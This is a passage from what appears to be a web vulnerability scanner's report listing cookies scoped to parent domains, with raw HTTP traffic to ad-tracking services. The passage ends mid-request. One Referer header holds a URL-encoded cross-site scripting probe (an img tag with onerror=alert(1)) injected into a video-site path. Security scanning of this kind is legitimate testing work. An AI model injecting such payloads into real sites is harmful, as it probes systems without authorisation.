HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 19:50:09 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4B06F1[CE]; Expires=Tue, 2 Feb 2016 19:50:09 GMT; Domain=.2o7.net; Path=/ Location: http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s07192756696604?AQB=1&pccr=true&g=none&AQE=1 X-C: ms-4.3.1 Expires: Wed, 02 Feb 2011 19:50:09 GMT Last-Modified: Fri, 04 Feb 2011 19:50:09 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www70 Content-Length: 0 Content-Type: text/plain Connection: close
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4AFFAE[CE]; Expires=Tue, 2 Feb 2016 19:19:10 GMT; Domain=.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/superpagesadvert/1/H.14/s07964217748958 HTTP/1.1 Host: superpages.122.2o7.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26A57D64051D0D1E-40000106C07D15FB[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];
Response
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 19:19:10 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4AFFAE[CE]; Expires=Tue, 2 Feb 2016 19:19:10 GMT; Domain=.2o7.net; Path=/ Location: http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s07964217748958?AQB=1&pccr=true&g=none&AQE=1 X-C: ms-4.3.1 Expires: Wed, 02 Feb 2011 19:19:10 GMT Last-Modified: Fri, 04 Feb 2011 19:19:10 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www262 Content-Length: 0 Content-Type: text/plain Connection: close
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4B06F2[CE]; Expires=Tue, 2 Feb 2016 19:50:10 GMT; Domain=.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/superpagesadvert/1/H.14/s081445949617 HTTP/1.1 Host: superpages.122.2o7.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26A57D64051D0D1E-40000106C07D15FB[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];
Response
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 19:50:10 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4B06F2[CE]; Expires=Tue, 2 Feb 2016 19:50:10 GMT; Domain=.2o7.net; Path=/ Location: http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s081445949617?AQB=1&pccr=true&g=none&AQE=1 X-C: ms-4.3.1 Expires: Wed, 02 Feb 2011 19:50:10 GMT Last-Modified: Fri, 04 Feb 2011 19:50:10 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www384 Content-Length: 0 Content-Type: text/plain Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site/2174 HTTP/1.1 Host: tags.bluekai.com Proxy-Connection: keep-alive Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: bku=yQG99YBZ/AlFQiDm; bko=KJyE8VBQrsg+f1F/G1gnywedoutxBRZBQKWJA1UsT16nREW00wcOVcK9R+Ijp/WLuSOR3gTVA9D9U19xnx==; bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCxhSbwgwfJuNrLbgAjcW6RsvELmqx2eBcBdfw0T0U4o9Hfs9NupXHyt8uO/zgeittavDQ2DeZe/9wW4e4PD3jjcB7tNF42Kb47a5Zc1RaDVaA01OpXWzC8sAU24bebUlPjK6GZj2Mebc0QKZRsn3ebJ4m2zpx+xnSOlmwRy9YZD8Gjsn8Mz5zrLn8uSySsaE4UzDttHnq73gDpla6x2xUtxxyQAdXYN5F1NacALxvojIOkRJOBRsH/N5KYZCX9BNXSf9XxYeJQ5kokiI8F5cXLR9vjdXumQucZBtzr9J0qGo9=; bkst=KJhMR5Mehx9W+0LX4PAReQcjvQhsaCSJaZRZjg3VvRRsrijJ8AZbuzRoSqGoiHRZhLqs8oSVSKqkBf09biX9Nq1pkmjk8IVU8dAyZymawQYaCOk1eWh1M1yLe/h1EY61nzlBM/6LcMvOowZ8yqSOtqfzunolQTPS1/VZ9/DDsch5XQN0yLJBFnh541NXiLnzL6o10Nv2A6r5w101AX/eEPb9ln1D3aSSy57HB5MPB5pUFXent2y2w3xXnb303BhE+0MR8w2nVb90UCbysXlBeWyLMuy+nR61Mu61e1tBMRdDQt0DTtPQTsa/5lBB23G351bvX1gbX1XJvBTnaB5Qv121i5zNO/SYCRsoiSkhFWZviSs8AjsHoqkHD3vJcMeQEW6+nYlLN8RfIQ/9LG8V89==; bk=s/wmp1UR22QsHNJo; bkc=KJh566N/PaWDOded7x2N7OALjoWPDh9bZC9PYkjup+eYs7C2xJusVm/c+OY7BCVk/TC/jJLvtAPONAvyyWUHNtJG6uT/CsezOOWsWVlDxvpmKKd55I4zpUFXKm4MzL28dxgGMxOdUI2p/iQDILAwqhrUSTOwkTcRV+bCEtOdcJUZ4mt71SOoesCRpM+CvB4lgAF4+zp8tF4MxaVBx+r0PTI2jpIWmPbfPmF8bC4M/lcoH1ATHL8Bu92mug2dRwy0urTO8ZTzelyinLl2+52u4GEbkSXjEIIu87C+fL4Fb4GrNlwI2dUDqiKvN9ufR6obRzaTiJJZB2w1rGbbIKy7kgZK5GAKpfzODpzfbqTlb+MpkMkKK6zubs8DKaU1AodPL72Z/1pht74/o2LD1k50EQJqyO8rkmjTfUcS7tipyAT07Td2QFSg6FmVmP2fo+gpY+NcYnXstJN26k7nbEcMVjgk/53l4pXmrdURO0hp4Vtb4G0uFNUTArPK0pumy1m6nTF7Q12nOywUJbD8UprjGc2hAXvcR7FQ+uooM+zIxd4E1Qv1MOLlVIjTfqwIKDdbnFg2YtcMY8qd5OFlCnlTBbatZ7d/2VHSIksg2swn8p13Xs2ddfIsFwgLDlcoX/g6EnDvUm4w3NpC4vF62NUoNcRPsw8IerN+Yj0fJqlRG/E4jSulBAkljvVwVD84BwTw/Leb1Q==; bkdc=res
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 20:52:27 GMT P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml" Expires: Fri, 04 Feb 2011 20:52:27 GMT Cache-Control: max-age=86400, private Set-Cookie: bk=hgA1oXUR22QsHNJo; expires=Tue, 02-Aug-2011 20:52:27 GMT; path=/; domain=.bluekai.com Set-Cookie: bkc=KJh566N/PaWDOded4EmMMMmehu00RCJYhyI/YQDgvV5GRxtXwiOvx0GoCHqiNvSi59xHiVhExqLG0aG/agQGIkG1n5GaQHY1Z0eY/vvBsDx48fplfg+pfrR24+hpf7Zzz2bx9QSMyBXUm2yGiLDCXg6qhoDbTw6a/n8VzmA/fc5M6o0FduQm+/TepuLaBynkI4RPbPrVmPdfEQvG3PwGVFcFRtdqYVsmN0fUIff66UC4xMojBGbEX8wu8bSAl2yN4CRMeyepPyIswoux8FgSg0QduFD3kTN7+AopFeqUTd51R8d7IKeX5fg5MuW20Kbjkk8zBObZon7NBnmIdPTIIbakFAIfE/X7ZTeoSflDfpXBf9UncvI2JxU6+0QXnIU/MIFjlf/x87M+ZIuMUxgjilAlixNQMfH/zfptOmNwgWtCiK0Q3jl2kwSgtQrVmP2f++qlvFUey4KpfB8E6M7nZUcMmjgkc+3l4NdlKFNCffn12t+EIpasdkpkX8Rcn51TxGdxFi059eTLfyf5ZJnZ4mNDAFfa5xoFu2tCNt3AmPffswV7RhxR7EOrLXphtLKefp6zrOEDn6S1ENFINVXXWwcMUpg5BcdcXNHsI7b729wnJf132/2QdpX8dFlL/y7o0vg6qv6vlHe13Nnkx346k8dubz63B/n2cBfKWEodUU3oVxZdpAoFqJUr0DA4LJy8Rdy45E7fPQ==; expires=Tue, 02-Aug-2011 20:52:27 GMT; path=/; domain=.bluekai.com Set-Cookie: bkdc=res; expires=Fri, 04-Feb-2011 20:52:27 GMT; path=/; domain=.bluekai.com BK-Server: 1c6d Content-Length: 62 Content-Type: image/gif Connection: keep-alive
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site/2491?ss_rand=637007605 HTTP/1.1 Host: tags.bluekai.com Proxy-Connection: keep-alive Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: bku=yQG99YBZ/AlFQiDm; bko=KJyE8VBQrsg+f1F/G1gnywedoutxBRZBQKWJA1UsT16nREW00wcOVcK9R+Ijp/WLuSOR3gTVA9D9U19xnx==; bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCxhSbwgwfJuNrLbgAjcW6RsvELmqx2eBcBdfw0T0U4o9Hfs9NupXHyt8uO/zgeittavDQ2DeZe/9wW4e4PD3jjcB7tNF42Kb47a5Zc1RaDVaA01OpXWzC8sAU24bebUlPjK6GZj2Mebc0QKZRsn3ebJ4m2zpx+xnSOlmwRy9YZD8Gjsn8Mz5zrLn8uSySsaE4UzDttHnq73gDpla6x2xUtxxyQAdXYN5F1NacALxvojIOkRJOBRsH/N5KYZCX9BNXSf9XxYeJQ5kokiI8F5cXLR9vjdXumQucZBtzr9J0qGo9=; bkst=KJhMR5Mehx9W+0LX4PAReQcjvQhsaCSJaZRZjg3VvRRsrijJ8AZbuzRoSqGoiHRZhLqs8oSVSKqkBf09biX9Nq1pkmjk8IVU8dAyZymawQYaCOk1eWh1M1yLe/h1EY61nzlBM/6LcMvOowZ8yqSOtqfzunolQTPS1/VZ9/DDsch5XQN0yLJBFnh541NXiLnzL6o10Nv2A6r5w101AX/eEPb9ln1D3aSSy57HB5MPB5pUFXent2y2w3xXnb303BhE+0MR8w2nVb90UCbysXlBeWyLMuy+nR61Mu61e1tBMRdDQt0DTtPQTsa/5lBB23G351bvX1gbX1XJvBTnaB5Qv121i5zNO/SYCRsoiSkhFWZviSs8AjsHoqkHD3vJcMeQEW6+nYlLN8RfIQ/9LG8V89==; bk=hgA1oXUR22QsHNJo; bkc=KJh566N/PaWDOded4EmMMMmehu00RCJYhyI/YQDgvV5GRxtXwiOvx0GoCHqiNvSi59xHiVhExqLG0aG/agQGIkG1n5GaQHY1Z0eY/vvBsDx48fplfg+pfrR24+hpf7Zzz2bx9QSMyBXUm2yGiLDCXg6qhoDbTw6a/n8VzmA/fc5M6o0FduQm+/TepuLaBynkI4RPbPrVmPdfEQvG3PwGVFcFRtdqYVsmN0fUIff66UC4xMojBGbEX8wu8bSAl2yN4CRMeyepPyIswoux8FgSg0QduFD3kTN7+AopFeqUTd51R8d7IKeX5fg5MuW20Kbjkk8zBObZon7NBnmIdPTIIbakFAIfE/X7ZTeoSflDfpXBf9UncvI2JxU6+0QXnIU/MIFjlf/x87M+ZIuMUxgjilAlixNQMfH/zfptOmNwgWtCiK0Q3jl2kwSgtQrVmP2f++qlvFUey4KpfB8E6M7nZUcMmjgkc+3l4NdlKFNCffn12t+EIpasdkpkX8Rcn51TxGdxFi059eTLfyf5ZJnZ4mNDAFfa5xoFu2tCNt3AmPffswV7RhxR7EOrLXphtLKefp6zrOEDn6S1ENFINVXXWwcMUpg5BcdcXNHsI7b729wnJf132/2QdpX8dFlL/y7o0vg6qv6vlHe13Nnkx346k8dubz63B/n2cBfKWEodUU3oVxZdpAoFqJUr0DA4LJy8Rdy45E7fPQ==; bkdc=res
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site/353?rand=0.9526619226671755 HTTP/1.1 Host: tags.bluekai.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/videoegg/ad.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: bku=yQG99YBZ/AlFQiDm; bko=KJyE8VBQrsg+f1F/G1gnywedoutxBRZBQKWJA1UsT16nREW00wcOVcK9R+Ijp/WLuSOR3gTVA9D9U19xnx==; bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCxhSbwgwfJuNrLbgAjcW6RsvELmqx2eBcBdfw0T0U4o9Hfs9NupXHyt8uO/zgeittavDQ2DeZe/9wW4e4PD3jjcB7tNF42Kb47a5Zc1RaDVaA01OpXWzC8sAU24bebUlPjK6GZj2Mebc0QKZRsn3ebJ4m2zpx+xnSOlmwRy9YZD8Gjsn8Mz5zrLn8uSySsaE4UzDttHnq73gDpla6x2xUtxxyQAdXYN5F1NacALxvojIOkRJOBRsH/N5KYZCX9BNXSf9XxYeJQ5kokiI8F5cXLR9vjdXumQucZBtzr9J0qGo9=; bkst=KJhMR5Mehx9W+0LX4PAReQcjvQhsaCSJaZRZjg3VvRRsrijJ8AZbuzRoSqGoiHRZhLqs8oSVSKqkBf09biX9Nq1pkmjk8IVU8dAyZymawQYaCOk1eWh1M1yLe/h1EY61nzlBM/6LcMvOowZ8yqSOtqfzunolQTPS1/VZ9/DDsch5XQN0yLJBFnh541NXiLnzL6o10Nv2A6r5w101AX/eEPb9ln1D3aSSy57HB5MPB5pUFXent2y2w3xXnb303BhE+0MR8w2nVb90UCbysXlBeWyLMuy+nR61Mu61e1tBMRdDQt0DTtPQTsa/5lBB23G351bvX1gbX1XJvBTnaB5Qv121i5zNO/SYCRsoiSkhFWZviSs8AjsHoqkHD3vJcMeQEW6+nYlLN8RfIQ/9LG8V89==; bk=UE2gfLUR22QsHNJo; bkc=KJh56AN/PaWDOded7UcDzVSyZWP3EWcGSWJDvJivmD1nStebQYQBLzxwSYaVZhnEWDxALA6afSxQS0aRTvnGSps6SOzWxMOrQCYeiej3Wag7Fw4rrlwr8MNIFwX88lcFvjxe7bXeTSN1PQWGAeIBuFKVseXn9dDExmNbJCrWzFhQEw3IjSfU4CQOuLLPZ+454rheH0c1KKNXCKrqUTtwHbuMKK1ymE6kwEQ+dKsHXSLxrx5RcedkIlHWZr5gFbwbWooUrsDXK6YSX2GXM2IpPPtmaflF4I1cL0cWo2M+12nn0XjePnuys8MFmrcDL82S87fSKU3X39aZq74uKV2ULozLzN8fUypGgkBT7DrH7NKy40RCpc7+KIHppxgJsIkLacF9c3bE8gptJmNw3WaCw87dMdtu23FRu8S8U7rrpwDs7Dz9FyqR7UluvzrJYK1arLLttg5dwp3z4rhMkgZdBC6dHL74ilpPz32krQf4yfxFvhKOnbr+F3+i6k0FcRLYmfLDwrjS4sIPu7BKIp05EI1/1eJolsYjX2GUFwX2Tp77pqXVBn8LIDIlzDdxpqXB+Be2OhhwJbx4B6AdLUyo3Upd2FqdVXe+ppTqAx8ru1IPv5IPl76PiohoAkfqk/fFPqffF4l4KUmW2LwNdaNMKwLf5nMH0qwE5bHUSoUyIbH65qN6K6gbomUWaKwdFfdTqQ==; bkdc=res
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 20:51:17 GMT P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml" Expires: Fri, 04 Feb 2011 20:51:17 GMT Cache-Control: max-age=86400, private Set-Cookie: bk=Rs4UCXUR22QsHNJo; expires=Tue, 02-Aug-2011 20:51:17 GMT; path=/; domain=.bluekai.com Set-Cookie: bkc=KJh56AN/PaWDOded7UcDzVSyZWPZEWcGSWJAvsivmA1nStebQYQBbRBuzYamqEHuHhYH6eRP+JmYg/PQQRrigXUxGk6xY1s6YD/1/+3RxVu5X2bffXb8ZhkIFwX88lnFvPRYcbTOTSN1PQWGA+IwuQIDsEXm9ytExBNsJCrWz7plCFx50N0F4uXYkaz3+sbTd5Qce6mRX23av+5M7T0f/2nHQ7sR7JbVFMGMd4SIX41xrH2RF77z2TZ/B1dU4AlNjEuFmsTX+NISX2GXMdd7S7G5nlF4dXxwjWm/Ef1fjbPUPT6c3VCoJfeRK2uojpI0pwt6YdEp+OSR7KiCId8qpPbhpc7+FEsQgNfCHE8a4knadobW1mKNq8Bw+0GAgbKpDKyYKbCKZFwSDfxdGDSa4VxIcdLjfPKoP0hpF4jYCK+BrGX94khC2N0xEkkmEOGF6P+t6nf2I2qk2smlVIqIt7E2sYPdn4sy8xcn2O0ICtC4NLTOcpX4XP6EAIjbfPQDtBbCXYf487rgUJgptZ4G4oosQJWoT6qn7BzIb8llomKXBpXUBn8GIUK4zUdxpqXv+BcfOhpwJvx4+WQd+cyI3Upd2wqduXe+ppTPAx8rui2DvBdPl7LPu8hoAPfdJHl4Glh42FjdItDp7uKUR0dmsXwqlXaeEDbK7qTkFPS7CBXAoUzlucKZo/2jEky0dQIhCFGy; expires=Tue, 02-Aug-2011 20:51:17 GMT; path=/; domain=.bluekai.com Set-Cookie: bkdc=res; expires=Fri, 04-Feb-2011 20:51:17 GMT; path=/; domain=.bluekai.com BK-Server: a96f Content-Length: 62 Content-Type: image/gif Connection: keep-alive
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site/365 HTTP/1.1 Host: tags.bluekai.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-5843489_1296770394,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;pos=atf;tile=1;dcopt=ist;sz=728x90;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296770389? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: bku=yQG99YBZ/AlFQiDm; bkst=KJhMR5Mehx9W+0LX4PAReQcjvQhsaCSJaZRZjg3VvRRsrijJ8AZbuzRoSqGoiHRZhLqs8oSVSKqkBf09biX9Nq1pkmjk8IVU8dAyZymawQYaCOk1eWh1M1yLe/h1EY61nzlBM/6LcMvOowZ8yqSOtqfzunolQTPS1/VZ9/DDsch5XQN0yLJBFnh541NXiLnzL6o10Nv2A6r5w101AX/eEPb9ln1D3aSSy57HB5MPB5pUFXent2y2w3xXnb303BhE+0MR8w2nVb90UCbysXlBeWyLMuy+nR61Mu61e1tBMRdDQt0DTtPQTsa/5lBB23G351bvX1gbX1XJvBTnaB5Qv121i5zNO/SYCRsoiSkhFWZviSs8AjsHoqkHD3vJcMeQEW6+nYlLN8RfIQ/9LG8V89==; bko=KJpMTsPQAJe62ZPAWmPMRnC3fxhA3xnadgI6Oq/ZLEWyw9s0tOiXKuWLHQR8wCMgekeLm818AYDJaWFPNyv09JtgWxy=; bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCxhSbwgwfJuNrLbgAjcW6RsvELmqx2eBcBdfw0T0U4o9Hfs9NupXHyt8uO/zgeiItK1DQ2DeZe/OOnucgf4gN2FqcRgzDKHQ1P9ND/VE9yPYr8a3TyHPRwzGIqSi7En/8LKIFfdglEXTgLyXe3guyjs9fIYmxXMSnIwNe2gf3LwuVE1IhC5e8xwE1eaNe2AF7KmjGV/BKOlmdRy9YZD8Gjsn8MXzzrLn8uSySsaE4UzDttHnq73gDpla6x2xUtxxyQAdXYN5F1NacALxvojIOkRJOBRsH/N5KYZCX9BNXSf9XxYeJQ5kokiI8F5cXLR9vjdXumQucZBtzr9/usgtT=; bk=viY1yZVZbt/sHNJo; bkc=KJh566N/PaWDOded7uX5jySnVExVAh9b4AODvaCJmD1nStnbQYQBbRBuSYWp+uAocDaW/++D6YTvLCSYOubvoko1n+GaQHO1Z0eYx1vBsDx48Xhf2NlwlqpcMdzd2f8fpftk1n9y9ixSer5XYvaW4Z58/s9XPQLWVhDSgtE/MVlL8lA/pN7ZKrlp0Fc4Pp+p9Hxvf9KlMYrDdl9jYv2kzdxJfw58SSfU4AndNp/vBYNkzlbG3rImuBIhpwUS20J93aSCzXAjMfN2aTx8gNtrzlpNAdcIicu6qOyZjXSkn68/FfNFdYJ/fQ5Zghd04Yxip4BgFbqb91NUrVRX+DtSX2GXcfI7WgNPpfg44X4qzAcWh275A2npXXSePeupAUgVKbOSpl8LZz4En+wMtVjQXARwf4K4KFSzjz8gqT6O4z6vnT+oX+1b27/vyopUFA6Il3ZxGF1PhuSyC83kmSX2UKBTk5qMyTXnfJTp6Z7n0PcMsKgaUMGFdffF3bbwF5L0Mb2BtTzXIKLbUf/XRJZt6d1x2UFhawehXhfwijQ6NtFcG7uUBiQLanLXgTVAmS22Qr8EIp9ywsqzSo7pti45dpl3rrMmUd9q7fUX3XITlIdAufTrboIFbGZA211mbDKVEbKD8hUldcfhmKmpM6VAdSFu6pUvzflqgXGbjprAFdtDMZ2H7rsKgXW5fjTpBbDUZ8EyZ8H6xT+65NgbGmUAmKwdAK9Ydx==; bkdc=res
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 21:59:56 GMT P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml" Expires: Fri, 04 Feb 2011 21:59:56 GMT Cache-Control: max-age=86400, private Set-Cookie: bk=gsKMbtVZbt/sHNJo; expires=Tue, 02-Aug-2011 21:59:56 GMT; path=/; domain=.bluekai.com Set-Cookie: bkc=KJh5NW+GWNWDOrOdXZgEJnuuCSAuY2vAehYPa3GVqRvnSAoXQBCVQQI6OHzC6R6VqH1GoRCNGT/fDqYbvauCYXV3i2iam6WGYcWMiaxGT3jVWOd7EmqmfqZqZ47/4Ib8zII58Yl9Vyj0iRWLwuJwk8hwKpW/n/6OLKSOg9zOttXBzN88GCfy+N+GrjyZ+luy7hDQwsIRb8Uwm4ldF+0P2SaRjBId3Ptkdw+nxc92RXIwdSTQp4UvMtkIqKB9b6GZbTPkIXbR2sleUv2XByxWbiN6g2EsRIdReVcmvNzSSgf0D4+9ueoz6xbu6tUoY8wuqI8owdKECTs8ST55cykJzldkPNEFGlfP32gEtbD8gXp2IeT5bfz28dpIm23H2uBSjF5muuXLS/2x6KyZtgwIQlR2I8aCcAI8xoK7VTYoblt6l7XSt4msmSIXnx/1Ju0XvvU/EhgR36A/zNf8aFkT+TDA7SXyBG12ZoeZFwJ1UzNg2eTK4edwfML+7E/zc2KKoqlRHI4klf422Frh2hMZXjPoIP9Q427QiTjpCZA8URdu4iXw9CXIfUD5i6CpFU/AEB2uATVkDGdg2R9688Pw6w4DZS4dCx7+5LmzPpfopwKGT8nEFIMPwZwTN8etLnKVUdE66w88qWdsoH26uEX64Yoor4fC7Bdw7+gTfs1CSKIS2W058qgHtSd3OZKbondIk/8r+PpemPXMmp+5ot2/nf5Sy3IE6LN+6g6obDmsTtKNdymwKyqy; expires=Tue, 02-Aug-2011 21:59:56 GMT; path=/; domain=.bluekai.com Set-Cookie: bkdc=res; expires=Fri, 04-Feb-2011 21:59:56 GMT; path=/; domain=.bluekai.com BK-Server: 1c6d Content-Length: 62 Content-Type: image/gif Connection: keep-alive
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: translate.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 20:32:56 GMT Expires: Thu, 03 Feb 2011 20:32:56 GMT Cache-Control: private, max-age=86400 Content-Type: text/html; charset=UTF-8 Content-Language: en Set-Cookie: PREF=ID=705d98a7bc0e380c:TM=1296765176:LM=1296765176:S=sHB4e3nekqE-YD1z; expires=Sat, 02-Feb-2013 20:32:56 GMT; path=/; domain=.google.com X-Content-Type-Options: nosniff Server: translation X-XSS-Protection: 1; mode=block Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /Tracking/V3/Instream/Impression/?0|1574|42244|30521|5745|14160|HEADER|868|2293|413|BBEEND|&internalRedirect=true&cb=%timestamp%&ss_rand=98204660 HTTP/1.1 Host: trk.vindicosuite.com Proxy-Connection: keep-alive Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 